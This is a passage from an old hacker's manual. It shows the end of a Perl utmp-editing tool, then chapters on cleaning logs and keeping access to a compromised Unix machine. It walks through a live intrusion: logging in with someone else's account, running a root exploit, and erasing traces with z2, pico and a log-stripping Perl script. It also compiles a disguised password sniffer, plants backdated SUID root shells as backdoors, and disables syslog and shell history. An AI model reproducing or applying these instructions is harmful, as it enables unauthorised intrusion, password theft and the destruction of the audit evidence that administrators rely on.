  3975.     unpack("i L a12 a4 L a8 a16 a4", $newbuff);
  3976.                              
  3977.   return $newnode;
  3978. }  
  3979.  
  3980.  
  3981. sub newport {
  3982.  
  3983.   $newnode = bless {
  3984.     "port" => undef, "rdev" => undef, "owner" => undef, "cmd" => undef,
  3985.   }, 'PORTNODE';
  3986.   
  3987.   @{$newnode}{qw(port rdev owner)} = @_;
  3988.   
  3989.   return $newnode;
  3990. }
  3991.  
  3992.  
  3993. sub newproc {
  3994.  
  3995.   $newnode = bless {
  3996.     "cmd" => undef, "port" => undef, 
  3997.   }, 'PROCNODE';
  3998.   
  3999.   @{$newnode}{qw(cmd port)} = @_;
  4000.   
  4001.   return $newnode;
  4002. }
  4003.  
  4004.  
  4005. # Renumber hashes to default order.
  4006. sub resync {
  4007.   my(%newhash) = ();
  4008.   my($count)=0;
  4009.  
  4010.   # Write ordered list in to temporary hash, deleting as we go.
  4011.   foreach (sort( {$a <=> $b} keys(%entries))) {
  4012.     $newhash{++$count} = $entries{$_};
  4013.     delete($entries{$_});
  4014.   }
  4015.  
  4016.   # Copy elements back in to original hash table.
  4017.   foreach (sort( {$a <=> $b} keys(%newhash))) {
  4018.     $entries{$_} = $newhash{$_};
  4019.   }
  4020. }
  4021.  
  4022.  
  4023. sub longtodot4 {
  4024.   my($addr)=shift;
  4025.  
  4026.   return join(".", map( ord($_), split(//, $addr)));
  4027. }
  4028.  
  4029. sub dev2id {
  4030.   my($portlist, $rdev) = @_;
  4031.  
  4032.   foreach (sort(keys(%{$portlist}))) {
  4033.     return $_ if (%{$portlist}->{$_}->{"rdev"}==$rdev);
  4034.   }                               
  4035.   return undef;
  4036. }
  4037.  
  4038.  
  4039. sub listpos {
  4040.   my($arrayref, $search) = @_;
  4041.   my($count) = 0;
  4042.  
  4043. $^W = 0;
  4044.   foreach (@{$arrayref}) {
  4045.     return $count if ($search eq ${$arrayref}[$count]);
  4046.     $count++;
  4047.   }
  4048. $^W = 1;
  4049.  
  4050.   return undef;
  4051. }
  4052.  
  4053.  
  4054. ### DATE ROUTINES
  4055.  
  4056. # The following code taken & modified from the Date::Manip package.
  4057. # Here is his copyright:
  4058. #
  4059. ## Copyright (c) 1995,1996 Sullivan Beck. All rights reserved.
  4060. ## This program is free software; you can redistribute it and/or modify it
  4061. ## under the same terms as Perl itself.
  4062.  
  4063.  
  4064. sub SecsSince1970 {
  4065. # Parse as mm/dd/[cc]yy[:hh:mm[:ss]]
  4066.   my($datetime) = shift;
  4067.   my($m,$d,$y,$h,$mn,$s) = ();
  4068.  
  4069.   # If date is not defined, then return local current date and time.
  4070.   return time() if (!defined($datetime));
  4071.  
  4072.   $datetime =~ 
  4073.     s!^(\d{1,2})/(\d{1,2})/(\d{4}|\d{2})(?:\:(\d{2}):(\d{2})(?:\:(\d{2}))?)?!!;
  4074.   ($m, $d, $y, $h, $mn, $s) = ($1, $2, $3, $4, $5, $6);
  4075.   $m--;
  4076.  
  4077.   # Finalize time components and check them.
  4078.   $y = (($y < 70) ? "20":"19" . $y) if (length($y)==2); 
  4079.  
  4080.   # This checks for any *non-matched* portion of $datetime. If there is such
  4081.   # an animal, then there is illegal data specified. Also screens for undefined
  4082.   # components which HAVE to be in ANY valid date/time (ie, month, day, year).
  4083.   return undef if (!defined($m) || !defined($d) || !defined($y) || length($datetime));
  4084.  
  4085.   # Set time components with unspecified values.
  4086.   $s = 0 if (!defined($s));
  4087.   $mn = 0 if (!defined($mn));
  4088.   $h = 0 if (!defined($h));
  4089.  
  4090.   # Check for ranges.
  4091.   return undef if (($m > 11)    || ($h > 23)    || ($mn > 59)   || ($s > 59));
  4092.                      
  4093.   # Begin conversion to seconds since 1/1/70.
  4094.   my($sec_now,$sec_70)=();
  4095.   $sec_now=DaysSince999($m,$d,$y);
  4096.   return undef if (!defined($sec_now));
  4097.  
  4098.   $sec_now--;
  4099.   $sec_now = $sec_now*24*3600 + $h*3600 + $mn*60 + $s;
  4100.   $sec_70 =30610224000;
  4101.   return ($sec_now-$sec_70);
  4102. }
  4103.  
  4104.  
  4105. sub DaysSince999 {
  4106.   my($m,$d,$y)=@_;
  4107.   my($Ny,$N4,$N100,$N400,$dayofyear,$days)=();
  4108.   my($cc,$yy)=();
  4109.  
  4110.   $y=~ /^(\d{2})(\d{2})$/;
  4111.   ($cc,$yy)=($1,$2);
  4112.  
  4113.   # Number of full years since Dec 31, 0999
  4114.   $Ny=$y-1000;
  4115.  
  4116.   # Number of full 4th years (incl. 1000) since Dec 31, 0999
  4117.   $N4=int(($Ny-1)/4)+1;
  4118.   $N4=0         if ($y==1000);
  4119.  
  4120.   # Number of full 100th years (incl. 1000)
  4121.   $N100=$cc-9;
  4122.   $N100--       if ($yy==0);
  4123.  
  4124.   # Number of full 400th years
  4125.   $N400=int(($N100+1)/4);
  4126.  
  4127.   # Check to insure that information returns a valid day of year.
  4128.   $dayofyear=dayofyear($m,$d,$y);
  4129.   return undef if (!defined($dayofyear));
  4130.  
  4131.   # Compute day of year.
  4132.   $days= $Ny*365 + $N4 - $N100 + $N400 + $dayofyear;
  4133.  
  4134.   return $days;
  4135. }
  4136.  
  4137.  
  4138. sub dayofyear {
  4139.   my($m,$d,$y)=@_;
  4140.   my(@daysinmonth)=(31,28,31,30,31,30,31,31,30,31,30,31);
  4141.   my($daynum,$i)=();
  4142.   $daysinmonth[1]=29  if (!($y % 4));
  4143.  
  4144.   # Return error if we are given an invalid date.
  4145.   return undef if ($d > $daysinmonth[$m]);
  4146.  
  4147.   $daynum=0;
  4148.   for ($i=1; $i<$m; $i++) {
  4149.     $daynum += $daysinmonth[$i];
  4150.   }
  4151.   $daynum += $d;
  4152.   
  4153.   return $daynum;
  4154. }
  4155.  
  4156.  
  4157. ## END DATE ROUTINES.
  4158.       
  4159. # End of script.
  4160.  
  4161. 0;
  4162.  
  4163. --------------------- end of utmpman.pl
  4164.  
  4165. -------------------------
  4166. Chapter VI
  4167. Cleaning the log files
  4168. -------------------------
  4169.  
  4170. ------------------------------
  4171. Section 6A
  4172. A walk around a hacked system
  4173. -------------------------------
  4174.  
  4175. I can't stress the importance of this enough! Clean, Clean!!!!  In this section
  4176. I will take you on the system first hand and show you some basics on what to
  4177. look for, and on how to wipe your presence from the system.  To start this lets
  4178. logon a system:
  4179.  
  4180. Here is the step by step through the basic process:
  4181.  
  4182. ******----> see who is on the machine
  4183.  
  4184. [/home/master]finger @victim.net
  4185. [victim.net]
  4186. No one logged on.
  4187.  
  4188. ******----> good no one on, we will log on
  4189.  
  4190. [/home/master]telnet victim.net
  4191.  
  4192. Trying xxx.206.xx.140...
  4193. Connected to victim.net.
  4194. Escape character is '^]'.
  4195.  
  4196. Welcome to Victim Research Linux (http://www.victim.net) Red Hat 2.1
  4197. Kernel 1.2.13 on a i586
  4198.  
  4199.  
  4200. ns.victim.net login: jnsmith
  4201. Password:
  4202. Linux 1.2.13.
  4203. You have new mail.
  4204.  
  4205. ******----> Don't read his mail, you can cat all mail in /var/spool/mail
  4206.             and in each users /home/username/mail directory
  4207.  
  4208. ******----> Check again to see if anyone is on
  4209.  
  4210. [jnsmith@ns jnsmith]$ w
  4211.  
  4212. 5:36am  up 18 days,  8:23,  1 user,  load average: 0.01, 0.00, 0.00
  4213. User     tty       login@  idle   JCPU   PCPU  what
  4214. jnsmith   ttyp1     5:35am                      w
  4215.  
  4216. ******----> Just me, lets get root and get lost in the utmp!
  4217.  
  4218. [jnsmith@ns jnsmith]$ cd .term
  4219.  
  4220. ******----> Nice directory to hide stuff ;)
  4221.  
  4222. [jnsmith@ns .term]$ ./.u
  4223.  
  4224. ******----> I had this already waiting, it was the umounc.c exploit
  4225.  
  4226. Discovered and Coded by Bloodmask and Vio, Covin 1996
  4227.  
  4228. ******----> We are now root, lets use z2 to become invisible
  4229.  
  4230. bash# z2 jnsmith
  4231. Zap2!
  4232.  
  4233. ******----> Let's see if we are still on ...
  4234.  
  4235. bash# w
  4236. 5:37am  up 18 days,  8:24,  0 users,  load average: 0.08, 0.02, 0.01
  4237. User     tty       login@  idle   JCPU   PCPU  what
  4238.  
  4239. ******----> Hmm. now there is no one on the system, i must have logged off ;)
  4240.  
  4241.  
  4242. ******----> We know we are root, but lets check you you can see ...
  4243.  
  4244. bash# whoami
  4245. root
  4246. bash#
  4247.  
  4248. ******----> Yup, root ..  What directory are we in?
  4249.  
  4250. bash# pwd
  4251. /home/jnsmith/.term
  4252.  
  4253. ******----> Let's check the logs
  4254.  
  4255. bash# cd /var/log
  4256.  
  4257. ******----> most of the time in /var/adm, this box uses /var/log
  4258.  
  4259. bash# grep dormroom *
  4260. maillog:Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
  4261. maillog:Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com
  4262.  
  4263. ******----> Yup, the z2 took care of everything but this maillog ...
  4264.  
  4265. bash# pico maillog
  4266.  
  4267. ******----> in pico i did a ctrl w, and searched for dormroom then ctrl k to
  4268.             delete lines
  4269.  
  4270.  
  4271. ******----> These were the lines deleted
  4272.  
  4273. Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
  4274. Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com
  4275.  
  4276. bash# grep dormroom *
  4277.  
  4278. ******----> Yup .. all clear ;)
  4279.  
  4280. bash# w
  4281. 5:41am  up 18 days,  8:27,  0 users,  load average: 0.00, 0.00, 0.00
  4282. User     tty       login@  idle   JCPU   PCPU  what
  4283.  
  4284. ******----> Yup .. all clear here too ;)
  4285.  
  4286. ******----> Lets show you how you would use lled and wted if the grep would
  4287.             have shown something in those files
  4288.  
  4289. bash# cd ~jnsmith/.term
  4290. bash# lled
  4291. bash# lled -c dormroom.playhouse
  4292. Entries stored: 527 Entries removed: 0
  4293. Now chmod lastlog.tmp and copy over the original /var/log/lastlog
  4294.  
  4295. ******----> Nothing in the lastlog
  4296.  
  4297. bash#
  4298. bash# wted -e jnsmith
  4299. Entries stored: 254 Entries removed: 0
  4300. Now chmod wtmp.tmp and copy over the original /var/log/wtmp
  4301.  
  4302. ******----> Nothing in the wtmp, both of these would have shown in the grep
  4303.             we just did in the /var/log (just showing you the commands)
  4304.  
  4305. ******----> Lets do some sniffing ...
  4306.  
  4307. bash# pico linsniffer.c
  4308.  
  4309. ******----> I changed this line to tell where i want the log to go:
  4310.  
  4311. #define TCPLOG "/tmp/.pinetemp.000"
  4312.  
  4313. ******----> lets look at what is running to think of a name that
  4314.             looks almost like it belongs there
  4315.  
  4316. bash# ps -aux
  4317.  
  4318. root       143  0.0  0.0   84    0  ?  SW  Jan 10   0:01 (lpd)
  4319. root       154  0.0  0.0  118    0  ?  SW  Jan 10   0:00 (smbd)
  4320. root       163  0.0  0.5   76  176  ?  S   Jan 10   0:00 nmbd -D
  4321. root       197  0.0  0.0   76    0 v03 SW  Jan 10   0:00 (getty)
  4322. root       198  0.0  0.0   76    0 v04 SW  Jan 10   0:00 (getty)
  4323. root       199  0.0  0.0   76    0 v05 SW  Jan 10   0:00 (getty)
  4324. root       200  0.0  0.0   76    0 v06 SW  Jan 10   0:00 (getty)
  4325. root       201  0.0  0.0   88    0 s00 SW  Jan 10   0:00 (uugetty)
  4326. root       209  0.0  0.2   35   76  ?  S   Jan 10   0:01 (update)
  4327. root       210  0.0  0.3   35  124  ?  S   Jan 10   0:03 update (bdflush)
  4328. root     10709  0.0  1.4  152  452  ?  S   Jan 27   0:10 httpd
  4329. root     11111  0.0  1.4  152  452  ?  S   Jan 27   0:07 httpd
  4330. root     14153  0.0  0.8   70  268  ?  S   Jan 16   0:03 ./inetd
  4331. root     14307  0.0  4.7 1142 1484  ?  S   Jan 16   1:16 ./named
  4332. root     14365  0.0  0.0   76    0 v02 SW  Jan 16   0:00 (getty)
  4333. root     17367  0.0  1.4  152  452  ?  S    11:01   0:02 httpd
  4334.  
  4335. ******----> lets compile it and name it nmb
  4336.  
  4337. bash# gcc linsniffer.c -o nmb
  4338.  
  4339. ******----> lets load it ...
  4340.  
  4341. bash# nmb&
  4342. [1] 22171
  4343.  
  4344. ******----> lets check the log file in /tmp
  4345.  
  4346. bash#
  4347. bash# cd /tmp
  4348. bash# ls -al .pin*
  4349. total 15691
  4350. -rw-rw-r--   1 root     jnsmith          0 Jan 29 05:50 .pinetemp.000
  4351.  
  4352. ******----> There it is, but we don't want our login to know about it!
  4353.  
  4354. bash# chgrp root .pin*
  4355.  
  4356. ******----> Lets look now ....
  4357.  
  4358. bash# ls -al .pin*
  4359. -rw-rw-r--   1 root     root            0 Jan 29 05:50 .pinttemp.000
  4360. bash#
  4361.  
  4362. ******----> This is good, Lets make an SUID shell so we don't have to
  4363.             do this again.  (check for MD5 or other programs in the cron)
  4364.  
  4365. bash# cd /bin
  4366. bash# ls -l sh
  4367. lrwxrwxrwx   1 root     root            4 Mar  1  1996 sh -> bash
  4368.  
  4369. ******----> This is a sym link ...
  4370.  
  4371. bash# ls -l bash
  4372. -rwxr-xr-x   1 root     root       299296 Nov  2  1995 bash
  4373.  
  4374. ******----> here is the real file ... lets see what to name it that
  4375.             looks like it belongs
  4376.  
  4377. bash# ls
  4378. arch           df             ksh            ping           tar
  4379. ash            dmesg          ln             ps             tcsh
  4380. bash           dnsdomainname  login          pwd            true
  4381. cat            domainname     ls             red            ttysnoops
  4382. chgrp          echo           mail           rm             umount
  4383. chmod          ed             mkdir          rmdir          uname
  4384. chown          false          mknod          sed            vi
  4385. cp             findterm       more           setserial      view
  4386. cpio           gunzip         mount          sh             vim
  4387. csh            gzip           mt             stty           zcat
  4388. date           hostname       mv             su             zsh
  4389. dd             kill           netstat        sync
  4390.  
  4391. ******----> How about a new command in linux, most admin's won't know
  4392.             the difference ;)  We will call it findhost
  4393.  
  4394. bash# cp bash findhost
  4395.  
  4396. ******----> ok, now lets have a look at our new unix command ...
  4397.  
  4398. bash# ls -l findhost
  4399. -rwxr-xr-x   1 root     jnsmith     299296 Jan 29 05:59 findhost
  4400.  
  4401. ******----> We need to change the group owner, touch the file date,
  4402.             and make it SUID
  4403.  
  4404. bash# chgrp root findhost
  4405. bash# ls -l findhost
  4406. -rwxr-xr-x   1 root     root       299296 Jan 29 05:59 findhost
  4407.  
  4408. bash# chmod +s findhost
  4409. bash# ls -l findhost
  4410. -rwsr-sr-x   1 root     root       299296 Jan 29 05:59 findhost
  4411.  
  4412. bash# touch -t 111312331995 findhost
  4413. bash# ls -l findhost
  4414. -rwsr-sr-x   1 root     root       299296 Nov 13  1995 findhost
  4415.  
  4416. bash# ls -l m*
  4417. -rwxr-xr-x   1 root     root        64400 Oct 31  1995 mail
  4418. -rwxr-xr-x   1 root     root         7689 Nov  2  1995 mkdir
  4419. -rwxr-xr-x   1 root     root         7001 Nov  2  1995 mknod
  4420. -rwxr-xr-x   1 root     root        20272 Nov  1  1995 more
  4421. -rwsr-xr-x   1 root     root        26192 Nov  1  1995 mount
  4422. -rwxr-xr-x   1 root     root         8381 Oct 31  1995 mt
  4423. -rwxr-xr-x   1 root     root        12753 Nov  2  1995 mv
  4424.  
  4425. ******----> Now it looks like it belongs ... lets see if
  4426.             it gives us root, exit our current root shell..
  4427.  
  4428. bash# exit
  4429.  
  4430. [jnsmith@ns .term]$ cd /bin
  4431. [jnsmith@ns /bin]$ whoami
  4432. jnsmith
  4433. [jnsmith@ns /bin]$ findhost
  4434. [jnsmith@ns /bin]# whoami
  4435. root
  4436.  
  4437. [jnsmith@ns /bin]# cd
  4438.  
  4439. ******----> cd {enter} takes us back to our home dir
  4440.  
  4441. [jnsmith@ns jnsmith]# ls
  4442. mail
  4443. [jnsmith@ns jnsmith]# echo + +>test
  4444. [jnsmith@ns jnsmith]# ls -l
  4445. total 2
  4446. drwx------   2 jnsmith   jnsmith       1024 Jan 11 22:47 mail
  4447. -rw-rw-r--   1 root      root            4 Jan 29 06:11 test
  4448.  
  4449. ******----> See now we are uid=0 gid=0
  4450.  
  4451. [jnsmith@ns jnsmith]# rm test
  4452.  
  4453. ******----> clean as we go .....
  4454.  
  4455. [jnsmith@ns jnsmith]# w
  4456. 6:12am  up 18 days,  8:58,  0 users,  load average: 0.07, 0.02, 0.00
  4457. User     tty       login@  idle   JCPU   PCPU  what
  4458.  
  4459. ******----> Just making sure we are still alone ....
  4460.  
  4461. [jnsmith@ns jnsmith]# ls -al /tmp/.p*
  4462. total 15692
  4463. -rw-rw-r--   1 root     root          157 Jan 29 06:10 .pinttemp.000
  4464.  
  4465. ******----> were getting passwords already ;)
  4466.  
  4467. [jnsmith@ns jnsmith]# ls -al
  4468. total 32
  4469. drwxrwx---   5 jnsmith   jnsmith   1024 Jan 29 06:11 .
  4470. drwxr-xr-x  33 root      users     1024 Jan 22 16:53 ..
  4471. -rw-r-----   1 jnsmith   jnsmith   1126 Aug 23  1995 .Xdefaults
  4472. lrwxrwxrwx   1 jnsmith   jnsmith      9 Jan  1 21:40 .bash_history -> /dev/null
  4473. -rw-r--r--   1 root      jnsmith     24 Jan  1 03:12 .bash_logout
  4474. -rw-r--r--   1 root      jnsmith    220 Jan  1 03:12 .bash_profile
  4475. -rw-r--r--   1 root      jnsmith    124 Jan  1 03:12 .bashrc
  4476. -rw-rw-r--   1 root      jnsmith   5433 Jan 11 22:47 .pinerc
  4477. drwxrwxr-x   2 jnsmith   jnsmith   1024 Jan 29 06:22 .term
  4478. drwxr-x---   2 jnsmith   jnsmith   1024 Feb 17  1996 .xfm
  4479. drwx------   2 jnsmith   jnsmith   1024 Jan 11 22:47 mail
  4480. [jnsmith@ns jnsmith]#
  4481.  
  4482. ******----> Make sure you place this sys link .bash_history to /dev/null so
  4483.             you do not leave a history behind...
  4484.  
  4485. This is the command to do it, but make sure you delete the old .bash_history
  4486. if it is there.
  4487.  
  4488. ln -s /dev/null .bash_history
  4489.  
  4490. Ok logout ...
  4491.  
  4492. Ok, there is another way!!!!!!
  4493.  
  4494. If you can remember and make it a practice that you NEVER forget, get used to
  4495. this.... EVERY TIME you login to an account type: unset HISTFILE
  4496.  
  4497. This will tell the system to delete your history file when you logoff the
  4498. system...   USE THIS!  Get into the practice!  DON'T FORGET!
  4499.  
  4500. -----------
  4501. Section 6B
  4502. messages and syslog
  4503. -----------
  4504.  
  4505. In the log directory you will find a file called 'messages' each system is
  4506. different as far as what is logged to what files or what file name.  Make
  4507. sure to check in the /etc/syslog.conf file for additional logging to
  4508. remote machines.  If this is being done you will see something like this:
  4509.  
  4510. *.*                                 @somehostname.xxx
  4511.  
  4512. Or just to check and see where the log files are going you can view this file
  4513. /etc/syslog.conf.
  4514.  
  4515. Here is a sample...
  4516.  
  4517. bash# more syslog.conf
  4518. # /etc/syslog.conf
  4519. # For info about the format of this file, see "man syslog.conf" (the BSD man
  4520. # page), and /usr/doc/sysklogd/README.linux.
  4521. #
  4522. # NOTE: YOU HAVE TO USE TABS HERE - NOT SPACES.
  4523. # I don't know why.
  4524. #
  4525.  
  4526. *.=info;*.=notice                               /var/adm/messages
  4527. *.=debug                                        /var/adm/debug
  4528. *.warn                                          /var/adm/syslog
  4529. *.warn                                          /root/.../syslog
  4530. *.=crit;kern.none                               /var/adm/critical
  4531. kern.info;kern.!err                             /var/adm/kernel-info
  4532. mail.*;mail.!=info                              /root/.../mail
  4533. mail,news.=info                                 /root/.../info
  4534. mail.*;mail.!=info                              /var/adm/mail
  4535. mail,news.=info                                 /var/adm/info
  4536. *.alert                                         root,bob
  4537. *.=info;*.=notice                               @quality.com
  4538. *.=debug                                        @quality.com
  4539. *.warn                                          @quality.com
  4540. *.=crit;kern.none                               @quality.com
  4541. kern.info;kern.!err                             @quality.com
  4542. mail.*;mail.!=info                              @quality.com
  4543. mail,news.=info                                 @quality.com
  4544.  
  4545. Here some of the logs are going into a hidden directory in the /root directory
  4546. and a copy of every alert and warning are being also sent to the logs at
  4547. quality.com.  wtmp, utmp and lastlog are still local, so you can still be
  4548. ok, just make sure not to use 'su' on a system like this.  Also notice above
  4549. that alert messages are being mailed to root and bob on this system.
  4550.  
  4551. Also take note that syslog, mail, and, info are being sent to the /var/adm
  4552. directory to fool you into thinking all of the logs are in /var/adm!  If you
  4553. edit /var/adm the admin can run a diff on the backup files in the /root dir.
  4554.  
  4555. Ok, so you go to the /var/adm or /var/log directory and:
  4556.  
  4557. grep yourhost * |more
  4558. grep your ip * |more
  4559.  
  4560. you see that some files are logging your connection, mark down what files
  4561. are logging you and edit the /etc/syslog.conf file.  You will from trial
  4562. and error in most cases make it skip the logging process of your domain.
  4563.  
  4564. BUT, make sure to do a few things.  After you edit the file restart the
  4565. syslogd.  You can do this by doing a ps -x
  4566.  
  4567. $root> ps -x
  4568.  
  4569. 39  ?  S    1:29 /usr/sbin/syslogd
  4570.  
  4571. find the syslogd and notice the process id here is 39, so you do:
  4572.  
  4573. kill -HUP 39
  4574.  
  4575. This will restart the process and put your changes into effect.
  4576.  
  4577. The other thing is to make sure to do a ls -l /etc/syslog.conf BEFORE you
  4578. edit it and touch the file date back to the original date and time after
  4579. you edit it.  This way if they notice the logging looks different, they
  4580. will check the file date and think it must be something else.  Most admins
  4581. would not know how to setup this file in the first place, so you in some
  4582. (or most) cases ok to edit it.
  4583.  
  4584. Here is another file to look at.
  4585.  
  4586. /etc/login.defs
  4587.  
  4588. # Enable "syslog" logging of su activity - in addition to sulog file logging
  4589. # SYSLOG_SG_ENAB does the same for newgrp and sg.
  4590. #
  4591. SYSLOG_SU_ENAB          yes
  4592. SYSLOG_SG_ENAB          yes
  4593. #
  4594. # If defined, all su activity is logged to this file
  4595. #
  4596. SULOG_FILE      /home/users/bob/.list
  4597.  
  4598. Notice here that there is an su log file in a hidden file in one of
  4599. the admin's directories.
  4600.  
  4601. -----------
  4602. Section 6C
  4603. xferlog
  4604. -----------
  4605.  
  4606. The xferlog can be edited with your favorite text editor, pico, joe, vi, etc..
  4607. you can then search for your transfers and delete the lines and save the file.
  4608. You will need to do this after transferring any files.
  4609.  
  4610. You will also want to grep the files in the /usr/local/etc/httpd/log directory
  4611. if you have used the web or phf on the system to remove your presence
  4612. from there.
  4613.  
  4614. grep (username or hostname) * |more
  4615.  
  4616. If you need to find the logs for httpd you can do a find -name httpd.conf
  4617. -print and view the config file you see where the httpd logs are going.
  4618.  
  4619. There might be different ftp logs for transfers in some ftp or virtual ftp
  4620. directory some where.  View the files in the /etc/ftp* to find what the ftp
  4621. setup is on the box.
  4622.  
  4623. Here I have shown you to edit log files using pico, joe, or other editors.
  4624.  
  4625. There is another way... Sometimes log files might be real large and the editor just might
  4626. not cut it ;)  Here is what to do...
  4627.  
  4628. You have a messages file 20 meg ... wow!
  4629.  
  4630. If you want to get the lines that have fudge.candy.com out of this file you
  4631. might want to do this:
  4632.  
  4633. grep -v fudge.candy >messages.2
  4634. rm messages
  4635. mv messages2 messages
  4636.  
  4637. then kill -HUP <process id for syslogd>
  4638.  
  4639. -v means grep everything that does not match the line, so you are greping
  4640. the file -what you do not want to a new file name messages.2.  Check the
  4641. file size after the grep to make sure no errors were made and replace the
  4642. old one with the new one and restart syslogd.
  4643.  
  4644. This can also be used with other logs like xferlog, syslog, etc...
  4645.  
  4646. Here is a perl script that will do it for you from command line.
  4647.  
  4648. ------------------- start of riptext.pl
  4649. #!/usr/bin/perl
  4650. #
  4651. # RipText - Takes regular expression and filename argument from @ARGV. Any 
  4652. #           lines MATCHING regular expression will *not* be printed to 
  4653. #           STDOUT. 
  4654. #
  4655.  
  4656. die("\nUsage: riptext [regexp] {filename}\n\n") if (!defined($ARGV[0]));
  4657. ($regexp, $filename) = @ARGV[0,1];
  4658.  
  4659. # Read in contents of file.
  4660. $/ = undef;
  4661. $contents="";
  4662. if (!defined($filename)) {
  4663.   # Use STDIN.
  4664.   $contents = scalar <STDIN>;
  4665. } else {
  4666.   # Use FILE.
  4667.   open(FILE, "<$filename") || die("-RipText- Cannot open $filename: $!\n");
  4668.   $contents = scalar <FILE>;
  4669.   close(FILE);
  4670. }
  4671.  
  4672. @contents = split(/\n/, $contents);
  4673.  
  4674. # Strip file of matching lines.
  4675. open(FILE, ">$filename") || die("-RipText- Cannot write $filename: $!\n");
  4676. foreach (@contents) {
  4677.   print FILE "$_\n" unless (/$regexp/i);
  4678. }
  4679. close(FILE);
  4680.  
  4681. 0;
  4682.  
  4683. ------------------------ end of riptext.pl
  4684.  
  4685. Remember to restart syslogd after you edit files, true you will not see
  4686. the stuff, and it will be gone to your eyes, but if you do not restart the
  4687. process, the data is still in memory and can be retrieved until you restart
  4688. the process!
  4689.  
  4690. Also look for notes in the syslog that the syslogd process was restarted at
  4691. such and such a time.
  4692.  
  4693. ---------------
  4694. Section 6D
  4695. The cron table
  4696. ---------------
  4697.  
  4698. Make sure to look at admin's and root cron files, here in this system we find
  4699. a root cron file in: /var/spool/cron/crontabs
  4700. bash# ls -l
  4701. total 1
  4702. -rw-------   1 root     root          851 Jan 26 14:14 root
  4703.  
  4704. bash$ more root
  4705. # This updates the database for 'locate' every day:
  4706. 40 07 * * *       updatedb 1> /dev/null 2> /dev/null
  4707. 40 */12 * * *       /sbin/checkfs
  4708.  
  4709. there is a file running here in /sbin called checkfs.
  4710.  
  4711. bash$ cd /sbin
  4712. bash$ /sbin # more checkfs
  4713. #!/bin/bash
  4714.  
  4715. if [ ! -f /etc/default/fs/.check ]; then
  4716.   echo WARNING!! Filecheck default file cannot be found. Please regenerate.
  4717.     exit
  4718.     fi
  4719.  
  4720. md5sum /usr/bin/* > /tmp/filecheck 2>/dev/null
  4721. md5sum /usr/sbin/* >> /tmp/filecheck 2>/dev/null
  4722. md5sum /sbin/* >> /tmp/filecheck 2>/dev/null
  4723. md5sum /bin/* >> /tmp/filecheck 2>/dev/null
  4724. md5sum /usr/local/bin/* >> /tmp/filecheck 2>/dev/null
  4725. md5sum /usr/local/sbin/* >> /tmp/filecheck 2>/dev/null
  4726. md5sum /lib/* >> /tmp/filecheck 2>/dev/null
  4727. md5sum /usr/lib/* >> /tmp/filecheck 2>/dev/null
  4728. diff /tmp/filecheck /etc/default/fs/.check > /tmp/filecheck2 2>&1
  4729.  
  4730. if [ -s /tmp/filecheck2 ]; then
  4731.   mail -s FSCheck bin < /tmp/filecheck2
  4732.   fi
  4733.  
  4734. rm /tmp/filecheck /tmp/filecheck2 2>/dev/null
  4735.  
  4736. md5 is a checksum file, if you change or add a binary file to any of the
  4737. above directories the information of the changes will be mailed to the
  4738. admin.
  4739.  
  4740. ------------------------------
  4741. Chapter 7
  4742. Keeping access to the machine
  4743. ------------------------------
  4744.  
  4745. There are many ways to keep access to the machine, you will loose
  4746. access to many as you as you are learning, but I hope with this manual
  4747. and some experience you will become a stable hacker.
  4748.  
  4749. Section 7A
  4750. Tricks of the trade
  4751.  
  4752. Here are some 'tricks' of the trade that will help you keep access
  4753. to the machine.  After a system admin has found you out, they will be watching
  4754. for you and going through everything on the system.  They will go as far as
  4755. recompiling binary files, changing everyone's passwords, denying your host you
  4756. came in from to the machine, going through the passwd or shadow file, looking
  4757. for SUID files, etc....
  4758.  
  4759. When you see that you have been found out, do not try to get access to the
  4760. system again.  I have seen others right after being cought, try everyone of
  4761. their trojans, other accounts, and other backdoor's they placed for continued
  4762. access.  Well think about it, they are watching for you ... you are showing
  4763. them every in that you have to the system, and every exploitable file you
  4764. are making known to them.
  4765.  
  4766. NO!  WAIT!  Give it a few months, they will think everything is ok, and they
  4767. will relax and you can come in with one of the backdoor's they missed, and you
  4768. can do your thing on the logs for all of the attempts you made on the system
  4769. to get back in.
  4770.  
  4771. Ok here are some tricks of the trade.
  4772.  
  4773. History Files:
  4774. --------------
  4775. Always put your .bash_history to /dev/null, if you don't make sure you at least
  4776. edit it.  Remember the .bash_history will always have your last commands until
  4777. the logoff.  So if you edit it, it will show that you are editing it. You might
  4778. try changing your shell and editing it there, but this all seems like a pain,
  4779. just set it to /dev/null
  4780.  
  4781. 1. Delete the file in the user directory .bash_history if it there.
  4782. 2. Type this command in the home directory: ln -s /dev/null .bash_history
  4783.  
  4784. Nested directory:
  4785. -----------------
  4786. Always find a directory on the system to hide your files.  There are a few good
  4787. ones that most users never look into.
  4788.  
  4789. In the users home directory look for .term, all you will find in this directory
  4790. is an executable file called termrc.  Admin's and users alike are used to seeing this
  4791. hidden directory, and never EVER go into it.  if they did what do you think
  4792. they would say to an executable file being in there called termrc?  You are right!
  4793. Nothing .... it belongs there and it is what they expect to see there.
  4794.  
  4795. So lets say we make termrc a little bigger, and add suid perm's ... are you
  4796. getting the idea???? I hope you guessed it... go to the /bin directory and
  4797. type cp bash (or sh whatever is there) ~username/.term/termrc
  4798. then type : chown root ~username/.term/termrc
  4799.           : chgrp root ~username/.term/termrc
  4800.           : chmod +s ~username/.term/termrc
  4801.  
  4802. Now you have a nested file that can get you root on the system any time that
  4803. will not be easy for the admin to find.  If you want to get fancy, touch
  4804. the file date to make it look like an older file.
  4805.  
  4806. Another directory off the user accounts expected to be there and unused would
  4807. be .elm, .term or Mail, or try making a directory called '...' this is harder
  4808. to notice seeing the first directories that show are . and .., so it can go
  4809. un-noticed easy.  This is how it would look if they did a long ls:
  4810.  
  4811. 1024 Jan 29 21:03 .
  4812. 1024 Dec 28 00:12 ..
  4813. 1024 Jan 29 21:03 ...
  4814.  509 Mar 02  1996 .bash_history
  4815.   22 Feb 20  1996 .forward
  4816.  164 May 18  1996 .kermrc
  4817.   34 Jun 06  1993 .less
  4818.  114 Nov 23  1993 .lessrc
  4819. 1024 May 18  1996 .term
  4820. 1024 May 19  1996 public_html
  4821.  
  4822. see how it seems to just fit into place?
  4823.  
  4824. but if it was just a ls -l, this is what would be seen:
  4825.  
  4826. 1024 May 19  1996 public_html
  4827.  
  4828. Remember you can always look for some REAL LONG file path that you are sure
